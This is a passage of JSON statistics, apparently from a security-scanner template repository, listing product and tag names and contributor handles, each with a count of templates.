","count":1},{"name":"micollab","count":1},{"name":"cd-action","count":1},{"name":"youpic","count":1},{"name":"asyncrat","count":1},{"name":"dvdfab","count":1},{"name":"openautomationsoftware","count":1},{"name":"yiboo","count":1},{"name":"tox","count":1},{"name":"estate","count":1},{"name":"ticketmaster","count":1},{"name":"revslider","count":1},{"name":"joomlatag","count":1},{"name":"qbittorrent","count":1},{"name":"wbcecms","count":1},{"name":"1forge","count":1},{"name":"rebuild","count":1},{"name":"americanthinker","count":1},{"name":"linear","count":1},{"name":"rackup","count":1},{"name":"extralunchmoney","count":1},{"name":"homer","count":1},{"name":"b2evolution","count":1},{"name":"cybrotech","count":1},{"name":"ruckuswireless","count":1},{"name":"mastodonchasedemdev-mastodon-instance","count":1},{"name":"archibus","count":1},{"name":"web-viewer","count":1},{"name":"rujjie","count":1},{"name":"transmission","count":1},{"name":"hd-network_real-time_monitoring_system_project","count":1},{"name":"epm","count":1},{"name":"collectd","count":1},{"name":"voidtools","count":1},{"name":"mymfans","count":1},{"name":"kadence-blocks","count":1},{"name":"etoilewebdesign","count":1},{"name":"wp-slimstat","count":1},{"name":"systemmanager","count":1},{"name":"lucy","count":1},{"name":"infographic-and-list-builder-ilist","count":1},{"name":"aquasec","count":1},{"name":"zzzphp","count":1},{"name":"smartnode","count":1},{"name":"joget","count":1},{"name":"visual-studio-code","count":1},{"name":"spiderfoot","count":1},{"name":"bhagavadgita","count":1},{"name":"catfishcms","count":1},{"name":"phoronix","count":1},{"name":"codesnippets","count":1},{"name":"twig","count":1},{"name":"jh_404_logger_project","count":1},{"name":"foogallery","count":1},{"name":"appweb","count":1},{"name":"video_list_manager_project","count":1},{"name":"golang","count":1},{"name":"polarisft","count":1},{"name":"arris","count":1},{"name":"zentao","count":1},{"name":"ransomware","count":1},{"name":"rainbow_portal","count":1},{"name":"mastodon-social-tchncs","count":1},{"name":"helmet","count":1},{"name":"obsidian","count":1},{"name":"qmail","count":1},{"name":"deadbolt","count":1},{"name":"turbo","count":1},{"name":"liberty","count":1},{"name":"ipdata","count":1},{"name":"b2bbuilder","count":1},{"name":"giters","count":1},{"name":"plausible","count":1},{"name":"doh","count":1},{"name":"eg","count":1},{"name":"idemia","count":1},{"name":"machform","count":1},{"name":"codemenschen","count":1},{"name":"woo-bulk-price-update","count":1},{"name":"lob","count":1},{"name":"rsync","count":1},{"name":"7dach","count":1},{"name":"zmarsacom","count":1},{"name":"skaut-bazar_project","count":1},{"name":"geutebruck","count":1},{"name":"wiren","count":1},{"name":"ubiquiti","count":1},{"name":"tembosocial","count":1},{"name":"tracer","count":1},{"name":"sevone","count":1},{"name":"calendly","count":1},{"name":"wordpress-country-selector","count":1},{"name":"bws-social-login","count":1},{"name":"msmq","count":1},{"name":"teamwork","count":1},{"name":"realestate","count":1},{"name":"unshare","count":1},{"name":"koha","count":1},{"name":"phpipam","count":1},{"name":"jasperreport","count":1},{"name":"requests-baskets","count":1},{"name":"curcy","count":1},{"name":"rockettheme","count":1},{"name":"kube-state-metrics","count":1},{"name":"ui","count":1},{"name":"armorgames","count":1},{"name":"netgenie","count":1},{"name":"wintercms","count":1},{"name":"vinchin","count":1},{"name":"yoast","count":1},{"name":"musiciansocial-mastodon-instance","count":1},{"name":"shortcode","count":1},{"name":"graphite_project","count":1},{"name":"bible","count":1},{"name":"fortiauthenticator","count":1},{"name":"martech","count":1},{"name":"cloud-box","count":1},{"name":"vi","count":1},{"name":"cherokee","count":1},{"name":"member-hero","count":1},{"name":"iserver","count":1},{"name":"kmc_information_systems","count":1},{"name":"dionesoft","count":1},{"name":"heat-trackr_project","count":1},{"name":"fontsy","count":1},{"name":"incsub","count":1},{"name":"ko-fi","count":1},{"name":"maianscriptworld","count":1},{"name":"hackster","count":1},{"name":"jbzd","count":1},{"name":"stackhawk","count":1},{"name":"zmanda","count":1},{"name":"markdown","count":1},{"name":"ssi","count":1},{"name":"wow-company","count":1},{"name":"adoptapet","count":1},{"name":"wp-ban","count":1},{"name":"realgimm","count":1},{"name":"streamlabs","count":1},{"name":"kaggle","count":1},{"name":"salon24","count":1},{"name":"genie","count":1},{"name":"dotnetblogengine","count":1},{"name":"snapdrop","count":1},{"name":"impala","count":1},{"name":"identity_provider","count":1},{"name":"emerson","count":1},{"name":"tekon","count":1},{"name":"furaffinity","count":1},{"name":"czepol","count":1},{"name":"dojoverse","count":1},{"name":"cnvd2017","count":1},{"name":"narnoo-distributor","count":1},{"name":"siteomat","count":1},{"name":"crm-perks-forms","count":1},{"name":"quick-event-manager","count":1},{"name":"ixbusweb","count":1},{"name":"oxid","count":1},{"name":"biolink","count":1},{"name":"googlemaps","count":1},{"name":"datezone","count":1},{"name":"saml","count":1},{"name":"edx","count":1},{"name":"anydesk","count":1},{"name":"systeminformation","count":1},{"name":"opensearch","count":1},{"name":"unibox","count":1},{"name":"lastpass","count":1},{"name":"nownodes","count":1},{"name":"issabel","count":1},{"name":"unraid","count":1},{"name":"wattpad","count":1},{"name":"wiki","count":1},{"name":"intelx","count":1},{"name":"krweb","count":1},{"name":"stageshow_project","count":1},{"name":"users-ultra","count":1},{"name":"lacie","count":1},{"name":"xvideos-models","count":1},{"name":"wildcard","count":1},{"name":"i-mscp","count":1},{"name":"incomcms_project","count":1},{"name":"pmm","count":1},{"name":"omni","count":1},{"name":"mediakits","count":1},{"name":"tf2-backpack-examiner","count":1},{"name":"openproject","count":1},{"name":"b-elektro","count":1},{"name":"tracing","count":1},{"name":"topacm","count":1},{"name":"tiempocom","count":1},{"name":"compalex","count":1},{"name":"atg","count":1},{"name":"xenforo","count":1},{"name":"fortigates","count":1},{"name":"wp-paytm-pay","count":1},{"name":"steemit","count":1},{"name":"labtech","count":1},{"name":"cults3d","count":1},{"name":"asgaros","count":1},{"name":"tor","count":1},{"name":"officeserver","count":1},{"name":"codecabin","count":1},{"name":"amt","count":1},{"name":"communilink","count":1},{"name":"vultr","count":1},{"name":"anobii","count":1},{"name":"trakt","count":1},{"name":"senayan","count":1},{"name":"visionhub","count":1},{"name":"sso","count":1},{"name":"kerbynet","count":1},{"name":"free5gc","count":1},{"name":"twitcasting","count":1},{"name":"dockerhub","count":1},{"name":"csti","count":1},{"name":"jvm","count":1},{"name":"dasan","count":1},{"name":"wp_live_chat_shoutbox_project","count":1},{"name":"magabook","count":1},{"name":"meet-me","count":1},{"name":"acsoft","count":1},{"name":"pony","count":1},{"name":"mercusys","count":1},{"name":"wp-experiments-free","count":1},{"name":"kivicare-clinic-management-system","count":1},{"name":"fancentro","count":1},{"name":"11in1","count":1},{"name":"xfinity","count":1},{"name":"racksnet","count":1},{"name":"snapchat","count":1},{"name":"prexview","count":1},{"name":"pixelfedsocial","count":1},{"name":"acontent","count":1},{"name":"erlang","count":1},{"name":"completeview","count":1},{"name":"tecnick","count":1},{"name":"tri","count":1},{"name":"fusion","count":1},{"name":"web2py","count":1},{"name":"wpsolr","count":1},{"name":"'updraftplus'","count":1},{"name":"openvas","count":1},{"name":"girlfriendsmeet","count":1},{"name":"xdebug","count":1},{"name":"siteengine","count":1},{"name":"public_knowledge_project","count":1},{"name":"dashlane","count":1},{"name":"defi","count":1},{"name":"ways-ac","count":1},{"name":"academylms","count":1},{"name":"super-socializer","count":1},{"name":"twisted","count":1},{"name":"telecom","count":1},{"name":"frigate","count":1},{"name":"netvibes","count":1},{"name":"klogserver","count":1},{"name":"appjetty","count":1},{"name":"tappy","count":1},{"name":"html2wp","count":1},{"name":"exolis","count":1},{"name":"properties","count":1},{"name":"code-garage","count":1},{"name":"asa","count":1},{"name":"nevma","count":1},{"name":"thinvnc","count":1},{"name":"dwbooster","count":1},{"name":"covalent","count":1},{"name":"devbunch","count":1},{"name":"nihbuatjajan","count":1},{"name":"riskru","count":1},{"name":"totalwar","count":1},{"name":"hanta","count":1},{"name":"erensoft","count":1},{"name":"ciprianmp","count":1},{"name":"phalcon","count":1},{"name":"jobsearch","count":1},{"name":"thegatewaypundit","count":1},{"name":"plusnet","count":1},{"name":"office","count":1},{"name":"ultimate-weather_project","count":1},{"name":"filr","count":1},{"name":"primetek","count":1},{"name":"divido","count":1},{"name":"isg1000","count":1},{"name":"ecosys","count":1},{"name":"errorpage","count":1},{"name":"zaver_project","count":1},{"name":"cdi","count":1},{"name":"pirelli","count":1},{"name":"infusionsoft_project","count":1},{"name":"restler","count":1},{"name":"woo-order-export-lite","count":1},{"name":"mastodon-meowsocial","count":1},{"name":"catalogcreater","count":1},{"name":"monstracms","count":1},{"name":"cdist","count":1},{"name":"sco","count":1},{"name":"pluginops","count":1},{"name":"commonsbooking","count":1},{"name":"cheezburger","count":1},{"name":"exposed","count":1},{"name":"veriz0wn","count":1},{"name":"taringa","count":1},{"name":"portmap","count":1},{"name":"mobileviewpoint","count":1},{"name":"wpsecurityauditlog","count":1},{"name":"ourmgmt3","count":1},{"name":"smartertools","count":1},{"name":"sfd","count":1},{"name":"smartsheet","count":1},{"name":"nj2000","count":1},{"name":"vertex","count":1},{"name":"webcomco","count":1},{"name":"goliath","count":1},{"name":"maga-chat","count":1},{"name":"tengine","count":1},{"name":"bitrat","count":1},{"name":"xanga","count":1},{"name":"underconstruction_project","count":1},{"name":"kopano","count":1},{"name":"ctflearn","count":1},{"name":"primefaces","count":1},{"name":"vcloud","count":1},{"name":"openweather","count":1},{"name":"groomify","count":1},{"name":"likebtn-like-button_project","count":1},{"name":"patheon","count":1},{"name":"apteka","count":1},{"name":"autocomplete","count":1},{"name":"openpagerank","count":1},{"name":"intelliants","count":1},{"name":"basic","count":1},{"name":"ipdiva","count":1},{"name":"furiffic","count":1},{"name":"dirk_bartley","count":1},{"name":"anycomment","count":1},{"name":"icearp","count":1},{"name":"webcalendar","count":1},{"name":"wp-video-gallery-free_project","count":1},{"name":"wordpress_integrator_project","count":1},{"name":"eyou","count":1},{"name":"wishlistr","count":1},{"name":"ab_google_map_travel_project","count":1},{"name":"awin","count":1},{"name":"cx","count":1},{"name":"whm","count":1},{"name":"houzz","count":1},{"name":"wpcentral","count":1},{"name":"bricks","count":1},{"name":"suzuri","count":1},{"name":"businesso","count":1},{"name":"moinmoin","count":1},{"name":"khodrochi","count":1},{"name":"nirweb-support","count":1},{"name":"exponentcms","count":1},{"name":"searchwp","count":1},{"name":"kkFileview","count":1},{"name":"instructables","count":1},{"name":"duckdev","count":1},{"name":"murasoftware","count":1},{"name":"codeermeneer","count":1},{"name":"nocodb","count":1},{"name":"projector","count":1},{"name":"ultras-diary","count":1},{"name":"squirrelly","count":1},{"name":"bitcoin-forum","count":1},{"name":"cafecito","count":1},{"name":"nweb2fax","count":1},{"name":"helprace","count":1},{"name":"bold-themes","count":1},{"name":"treexml","count":1},{"name":"rpcms","count":1},{"name":"social-msdn","count":1},{"name":"turbocrm","count":1},{"name":"yunanbao","count":1},{"name":"emlog","count":1},{"name":"faust","count":1},{"name":"authelia","count":1},{"name":"csod","count":1},{"name":"watchmemorecom","count":1},{"name":"wpquery","count":1},{"name":"viessmann","count":1},{"name":"etherscan","count":1},{"name":"logger1000","count":1},{"name":"spx","count":1},{"name":"fark","count":1},{"name":"bonitasoft","count":1},{"name":"ilo4","count":1},{"name":"jsmol2wp","count":1},{"name":"sygnoos","count":1},{"name":"exagrid","count":1},{"name":"researchgate","count":1},{"name":"routeros","count":1},{"name":"ibm-decision-runner","count":1},{"name":"currencyscoop","count":1},{"name":"springframework","count":1},{"name":"supachai_teasakul","count":1},{"name":"trueranker","count":1},{"name":"ad-hoc","count":1},{"name":"remedy","count":1},{"name":"myfitnesspal-community","count":1}],"authors":[{"name":"dhiyaneshdk","count":1233},{"name":"daffainfo","count":864},{"name":"dwisiswant0","count":802},{"name":"pikpikcu","count":353},{"name":"pussycat0x","count":328},{"name":"ritikchaddha","count":313},{"name":"pdteam","count":285},{"name":"ricardomaia","count":232},{"name":"geeknik","count":227},{"name":"theamanrawat","count":221},{"name":"r3y3r53","count":200},{"name":"0x_akoko","count":179},{"name":"princechaddha","count":165},{"name":"gy741","count":158},{"name":"rxerium","count":138},{"name":"sleepingbag945","count":132},{"name":"arafatansari","count":119},{"name":"tess","count":109},{"name":"righettod","count":105},{"name":"pdresearch","count":73},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":63},{"name":"iamnoooob","count":61},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"rootxharsh","count":54},{"name":"philippedelteil","count":48},{"name":"gaurang","count":42},{"name":"edoardottt","count":41},{"name":"johnk3r","count":39},{"name":"c-sh0","count":35},{"name":"j4vaovo","count":34},{"name":"luisfelipe146","count":31},{"name":"adam crosser","count":31},{"name":"ice3man","count":28},{"name":"pwnhxl","count":25},{"name":"hardik-solanki","count":24},{"name":"organiccrap","count":24},{"name":"ctflearner","count":23},{"name":"techbrunchfr","count":23},{"name":"harsh","count":23},{"name":"mastercho","count":22},{"name":"ffffffff0x","count":22},{"name":"sullo","count":18},{"name":"parthmalhotra","count":18},{"name":"cckuailong","count":18},{"name":"random-robbie","count":16},{"name":"lu4nx","count":16},{"name":"0xpugazh","count":16},{"name":"shaikhyaser","count":16},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"unapibageek","count":15},{"name":"bhutch","count":14},{"name":"milo2012","count":14},{"name":"tenbird","count":14},{"name":"dogasantos","count":14},{"name":"r3dg33k","count":14},{"name":"sharath","count":13},{"name":"0ri2n","count":13},{"name":"theabhinavgaur","count":13},{"name":"elsfa7110","count":13},{"name":"melbadry9","count":13},{"name":"nullfuzz","count":13},{"name":"meme-lord","count":12},{"name":"suman_kar","count":12},{"name":"kazet","count":11},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"0x240x23elu","count":10},{"name":"co5mos","count":10},{"name":"alph4byt3","count":10},{"name":"hackergautam","count":10},{"name":"logicalhunter","count":10},{"name":"initstring","count":9},{"name":"olearycrew","count":9},{"name":"oppsec","count":9},{"name":"emadshanab","count":9},{"name":"adamcrosser","count":9},{"name":"momika233","count":9},{"name":"fabaff","count":9},{"name":"iamthefrogy","count":8},{"name":"veshraj","count":8},{"name":"_0xf4n9x_","count":8},{"name":"noraj","count":8},{"name":"aashiq","count":8},{"name":"irshad ahamed","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"caspergn","count":7},{"name":"amit-jd","count":7},{"name":"divya_mudgal","count":7},{"name":"tarunkoyalwar","count":7},{"name":"huta0","count":7},{"name":"its0x08","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"leovalcante","count":7},{"name":"nodauf","count":7},{"name":"harshbothra_","count":7},{"name":"forgedhallpass","count":6},{"name":"clem9669","count":6},{"name":"gitlab red team","count":6},{"name":"xelkomy","count":6},{"name":"ja1sh","count":6},{"name":"hahwul","count":6},{"name":"puzzlepeaches","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"byt3bl33d3r","count":6},{"name":"evan rubinstein","count":6},{"name":"__fazal","count":6},{"name":"megamansec","count":6},{"name":"imnightmaree","count":6},{"name":"pathtaga","count":6},{"name":"justaacat","count":6},{"name":"devang-solanki","count":6},{"name":"pentest_swissky","count":6},{"name":"robotshell","count":5},{"name":"ganofins","count":5},{"name":"vicrack","count":5},{"name":"gtrrnr","count":5},{"name":"mr-xn","count":5},{"name":"defr0ggy","count":5},{"name":"r3naissance","count":5},{"name":"lucky0x0d","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"your3cho","count":5},{"name":"arm!tage","count":5},{"name":"andreluna","count":5},{"name":"kh4sh3i","count":5},{"name":"powerexploit","count":5},{"name":"podalirius","count":5},{"name":"joanbono","count":5},{"name":"prajiteshsingh","count":5},{"name":"shine","count":5},{"name":"s0obi","count":5},{"name":"r12w4n","count":5},{"name":"3th1c_yuk1","count":4},{"name":"h1ei1","count":4},{"name":"wisnupramoedya","count":4},{"name":"heeress","count":4},{"name":"dadevel","count":4},{"name":"tanq16","count":4},{"name":"shankar acharya","count":4},{"name":"cookiehanhoan","count":4},{"name":"0xr2r","count":4},{"name":"dolev farhi","count":4},{"name":"jpg0mez","count":4},{"name":"ice3man543","count":4},{"name":"nybble04","count":4},{"name":"lum8rjack","count":4},{"name":"xxcdd","count":4},{"name":"king-alexander","count":4},{"name":"ggranjus","count":4},{"name":"scent2d","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"k0pak4","count":4},{"name":"matt galligan","count":3},{"name":"imjust0","count":3},{"name":"ph33r","count":3},{"name":"lucasljm2001","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"jarijaas","count":3},{"name":"evergreencartoons","count":3},{"name":"parth","count":3},{"name":"j3ssie","count":3},{"name":"skeltavik","count":3},{"name":"whoever","count":3},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"me9187","count":3},{"name":"randomrobbie","count":3},{"name":"f1tz","count":3},{"name":"bernardofsr","count":3},{"name":"alifathi-h1","count":3},{"name":"fyoorer","count":3},{"name":"davidmckennirey","count":3},{"name":"emenalf","count":3},{"name":"xianke","count":3},{"name":"cheesymoon","count":3},{"name":"pulsesecurity.co.nz","count":3},{"name":"_generic_human_","count":3},{"name":"e1a","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"canberbamber","count":3},{"name":"vagnerd","count":3},{"name":"taielab","count":3},{"name":"iamnooob","count":3},{"name":"ambassify","count":3},{"name":"atomiczsec","count":3},{"name":"ekrause","count":3},{"name":"fxploit","count":3},{"name":"lark-lab","count":3},{"name":"aringo","count":3},{"name":"z3bd","count":3},{"name":"huowuzhao","count":3},{"name":"true13","count":3},{"name":"isacaya","count":3},{"name":"badboycxcc","count":3},{"name":"farish","count":3},{"name":"arcc","count":3},{"name":"binaryfigments","count":3},{"name":"shifacyclewala","count":3},{"name":"andydoering","count":3},{"name":"dr0pd34d","count":3},{"name":"impramodsargar","count":3},{"name":"vsh00t","count":3},{"name":"mavericknerd","count":3},{"name":"swissky","count":3},{"name":"coldfish","count":3},{"name":"sushantkamble","count":3},{"name":"m4lwhere","count":3},{"name":"johnjhacking","count":3},{"name":"dudez","count":3},{"name":"unstabl3","count":3},{"name":"flx","count":3},{"name":"splint3r7","count":3},{"name":"zomsop82","count":2},{"name":"arliya","count":2},{"name":"ep1csage","count":2},{"name":"sbani","count":2},{"name":"nvn1729","count":2},{"name":"cocxanh","count":2},{"name":"uomogrande","count":2},{"name":"h0j3n","count":2},{"name":"0xcrypto","count":2},{"name":"vavkamil","count":2},{"name":"c3l3si4n","count":2},{"name":"mohammedsaneem","count":2},{"name":"convisoappsec","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"charles d.","count":2},{"name":"bananabr","count":2},{"name":"6mile","count":2},{"name":"g4l1t0","count":2},{"name":"dbrwsky","count":2},{"name":"0xelkomy","count":2},{"name":"thardt-praetorian","count":2},{"name":"shelled","count":2},{"name":"shankaracharya","count":2},{"name":"0xsmiley","count":2},{"name":"mzack9999","count":2},{"name":"zy9ard3","count":2},{"name":"dheerajmadhukar","count":2},{"name":"herry","count":2},{"name":"kishore-hariram","count":2},{"name":"sascha brendel","count":2},{"name":"notnotnotveg","count":2},{"name":"kiblyn11","count":2},{"name":"bsysop","count":2},{"name":"moritz nentwig","count":2},{"name":"davidegirardi","count":2},{"name":"github.com/its0x08","count":2},{"name":"danmcinerney","count":2},{"name":"kre80r","count":2},{"name":"foulenzer","count":2},{"name":"pxmme1337","count":2},{"name":"parzival","count":2},{"name":"thevillagehacker","count":2},{"name":"florianmaak","count":2},{"name":"mrharshvardhan","count":2},{"name":"cckuakilong","count":2},{"name":"streetofhackerr007","count":2},{"name":"thezakman","count":2},{"name":"myztique","count":2},{"name":"thabisocn","count":2},{"name":"rafaelwdornelas","count":2},{"name":"usdag","count":2},{"name":"gevakun","count":2},{"name":"joshua rogers","count":2},{"name":"codexlynx","count":2},{"name":"666asd","count":2},{"name":"koti2","count":2},{"name":"supras","count":2},{"name":"ree4pwn","count":2},{"name":"salts","count":2},{"name":"christianpoeschl","count":2},{"name":"korteke","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"n-thumann","count":2},{"name":"w4cky_","count":2},{"name":"raesene","count":2},{"name":"luci","count":2},{"name":"nuk3s3c","count":2},{"name":"paradessia","count":2},{"name":"redteambrasil","count":2},{"name":"ayadim","count":2},{"name":"supr4s","count":2},{"name":"bmcel","count":2},{"name":"maximus decimus","count":2},{"name":"hetroublemakr","count":2},{"name":"hackerarpan","count":2},{"name":"manas_harsh","count":2},{"name":"joshlarsen","count":2},{"name":"ajaysenr","count":2},{"name":"ehsahil","count":2},{"name":"randomdhiraj","count":2},{"name":"msegoviag","count":2},{"name":"sy3omda","count":2},{"name":"lotusdll","count":2},{"name":"gal nagli","count":2},{"name":"sinkettu","count":2},{"name":"afaq","count":2},{"name":"nkxxkn","count":2},{"name":"bing0o","count":2},{"name":"bp0lr","count":2},{"name":"brenocss","count":2},{"name":"wa1tf0rme","count":2},{"name":"joeldeleep","count":2},{"name":"d4vy","count":2},{"name":"brucelsone","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"0xsapra","count":2},{"name":"0xnirvana","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"martincodes-de","count":2},{"name":"k11h-de","count":2},{"name":"z0ne","count":2},{"name":"v0idc0de","count":2},{"name":"dahse89","count":2},{"name":"y4er","count":2},{"name":"dogancanbakir","count":2},{"name":"amsda","count":2},{"name":"udit_thakkur","count":2},{"name":"danielmofer","count":2},{"name":"socketz","count":2},{"name":"0xrudra","count":2},{"name":"paperpen","count":2},{"name":"clarkvoss","count":2},{"name":"geekby","count":2},{"name":"liwermor","count":2},{"name":"x1m_martijn","count":2},{"name":"8arthur","count":2},{"name":"fur1na","count":1},{"name":"elitebaz","count":1},{"name":"thebinitghimire","count":1},{"name":"w0tx","count":1},{"name":"5up3r541y4n","count":1},{"name":"gboddin","count":1},{"name":"jaskaran","count":1},{"name":"jub0bs","count":1},{"name":"rojanrijal","count":1},{"name":"chesterblue","count":1},{"name":"lark lab","count":1},{"name":"compr00t","count":1},{"name":"eremit4","count":1},{"name":"iampritam","count":1},{"name":"elouhi","count":1},{"name":"michal mikolas (nanuqcz)","count":1},{"name":"arjunchandarana","count":1},{"name":"mihhailsokolov","count":1},{"name":"jonathanwalker","count":1},{"name":"noah @thesubtlety","count":1},{"name":"co0nan","count":1},{"name":"un-fmunozs","count":1},{"name":"natto97","count":1},{"name":"soyelmago","count":1},{"name":"breno_css","count":1},{"name":"unkl4b","count":1},{"name":"liquidsec","count":1},{"name":"deena","count":1},{"name":"marcos_iaf","count":1},{"name":"alevsk","count":1},{"name":"8authur","count":1},{"name":"vzamanillo","count":1},{"name":"bjhulst","count":1},{"name":"floriandewald","count":1},{"name":"philippdelteil","count":1},{"name":"luciannitescu","count":1},{"name":"tim_koopmans","count":1},{"name":"b0rn2r00t","count":1},{"name":"prettyboyaaditya","count":1},{"name":"izn0u","count":1},{"name":"r3s ost","count":1},{"name":"evolutionsec","count":1},{"name":"orpheus","count":1},{"name":"0xh7ml","count":1},{"name":"youngpope","count":1},{"name":"win3zz","count":1},{"name":"x6263","count":1},{"name":"west-wise","count":1},{"name":"pjborah","count":1},{"name":"0xcharan","count":1},{"name":"ndmalc","count":1},{"name":"act1on3","count":1},{"name":"furkansayim","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"higor melgaço","count":1},{"name":"zandros0","count":1},{"name":"ahmed sherif","count":1},{"name":"zhenwarx","count":1},{"name":"mr.bobo hp","count":1},{"name":"jc175","count":1},{"name":"hakluke","count":1},{"name":"mhdsamx","count":1},{"name":"screamy","count":1},{"name":"zn9988","count":1},{"name":"vikas kundu","count":1},{"name":"manuelbua","count":1},{"name":"andirrahmani1","count":1},{"name":"shreyapohekar","count":1},{"name":"0xparth","count":1},{"name":"rodnt","count":1},{"name":"realexp3rt","count":1},{"name":"_c0wb0y_","count":1},{"name":"toufik-airane","count":1},{"name":"majidmc2","count":1},{"name":"ky9oss","count":1},{"name":"blckraven","count":1},{"name":"olewagner","count":1},{"name":"zsusac","count":1},{"name":"thirukrishnan","count":1},{"name":"luqman","count":1},{"name":"exploitation","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ynnirc","count":1},{"name":"pascalheidmann","count":1},{"name":"michael wedl","count":1},{"name":"jbaines-r7","count":1},{"name":"fmunozs","count":1},{"name":"chron0x","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"sherlocksecurity","count":1},{"name":"nerrorsec","count":1},{"name":"lady_bug","count":1},{"name":"dale clarke","count":1},{"name":"miryangjung","count":1},{"name":"tehtbl","count":1},{"name":"brianlam38","count":1},{"name":"jcockhren","count":1},{"name":"mayankpandey01","count":1},{"name":"babybash","count":1},{"name":"fopina","count":1},{"name":"sospiro","count":1},{"name":"ola456","count":1},{"name":"absshax","count":1},{"name":"mantissts","count":1},{"name":"ofjaaah","count":1},{"name":"b0yd","count":1},{"name":"queencitycyber","count":1},{"name":"retr0","count":1},{"name":"udyz","count":1},{"name":"af001","count":1},{"name":"akash.c","count":1},{"name":"phillipo","count":1},{"name":"aayush vishnoi","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"mubassirpatel","count":1},{"name":"jiheon-dev","count":1},{"name":"phyr3wall","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"hateshape","count":1},{"name":"dali","count":1},{"name":"yashanand155","count":1},{"name":"houdinis","count":1},{"name":"qlkwej","count":1},{"name":"chetgan","count":1},{"name":"sicksec","count":1},{"name":"kareemse1im","count":1},{"name":"d0rkerdevil","count":1},{"name":"josecosta","count":1},{"name":"unp4ck","count":1},{"name":"nuts7","count":1},{"name":"gonski","count":1},{"name":"dievus","count":1},{"name":"myst7ic","count":1},{"name":"alperenkesk","count":1},{"name":"whotwagner","count":1},{"name":"dwbzn","count":1},{"name":"dorkerdevil","count":1},{"name":"francescocarlucci","count":1},{"name":"nagli","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"mbmy","count":1},{"name":"cravaterouge","count":1},{"name":"wlayzz","count":1},{"name":"pry0cc","count":1},{"name":"naglis","count":1},{"name":"official_blackhat13","count":1},{"name":"schniggie","count":1},{"name":"0xteles","count":1},{"name":"hardik-rathod","count":1},{"name":"byobin","count":1},{"name":"_harleo","count":1},{"name":"0xtavian","count":1},{"name":"ipanda","count":1},{"name":"petruknisme","count":1},{"name":"retr02332","count":1},{"name":"sshell","count":1},{"name":"adilsoybali","count":1},{"name":"xeldax","count":1},{"name":"zeyad azima","count":1},{"name":"duty_1g","count":1},{"name":"christbowel","count":1},{"name":"bad5ect0r","count":1},{"name":"matt miller","count":1},{"name":"push4d","count":1},{"name":"0h1in9e","count":1},{"name":"jrolf","count":1},{"name":"oscarintherocks","count":1},{"name":"fq_hsu","count":1},{"name":"luqmaan hadia","count":1},{"name":"lixts","count":1},{"name":"rumble773","count":1},{"name":"notsoevilweasel","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"bywalks","count":1},{"name":"bughuntersurya","count":1},{"name":"kchason","count":1},{"name":"hazana","count":1},{"name":"andysvints","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sttlr","count":1},{"name":"borna nematzadeh","count":1},{"name":"1nf1n7y","count":1},{"name":"lingtren","count":1},{"name":"opencirt","count":1},{"name":"shivanshkhari","count":1},{"name":"thelicato","count":1},{"name":"jbertman","count":1},{"name":"daffianfo","count":1},{"name":"kresec","count":1},{"name":"alex","count":1},{"name":"omarjezi","count":1},{"name":"ayadi","count":1},{"name":"alexrydzak","count":1},{"name":"amir-h-fallahi","count":1},{"name":"hyunsoo-ds","count":1},{"name":"akokonunes","count":1},{"name":"jeya.seelan","count":1},{"name":"yusakie","count":1},{"name":"juicypotato1","count":1},{"name":"shiva (strobes security)","count":1},{"name":"aron molnar","count":1},{"name":"tangxiaofeng7","count":1},{"name":"f1she3","count":1},{"name":"vulnspace","count":1},{"name":"irshadahamed","count":1},{"name":"aaban solutions","count":1},{"name":"hexcat","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"geraldino2","count":1},{"name":"exceed","count":1},{"name":"p-l-","count":1},{"name":"pudsec","count":1},{"name":"ahmetpergamum","count":1},{"name":"wabafet","count":1},{"name":"aresx","count":1},{"name":"godfatherorwa","count":1},{"name":"willd96","count":1},{"name":"danigoland","count":1},{"name":"hczdmr","count":1},{"name":"booboohq","count":1},{"name":"b4uh0lz","count":1},{"name":"osamahamad","count":1},{"name":"rotemreiss","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"rinolock","count":1},{"name":"shelld3v","count":1},{"name":"lethargynavigator","count":1},{"name":"spac3wh1te","count":1},{"name":"technicaljunkie","count":1},{"name":"miguelsegoviagil","count":1},{"name":"sinsinology","count":1},{"name":"_darrenmartyn","count":1},{"name":"dk999","count":1},{"name":"0xceeb","count":1},{"name":"arr0way","count":1},{"name":"invisiblethreat","count":1},{"name":"pratik khalane","count":1},{"name":"carrot2","count":1},{"name":"0xprial","count":1},{"name":"ruppde","count":1},{"name":"drfabiocastro","count":1},{"name":"hotpot","count":1},{"name":"berkdusunur","count":1},{"name":"exid","count":1},{"name":"ling","count":1},{"name":"tirtha","count":1},{"name":"metascan","count":1},{"name":"adnanekhan","count":1},{"name":"jaimin 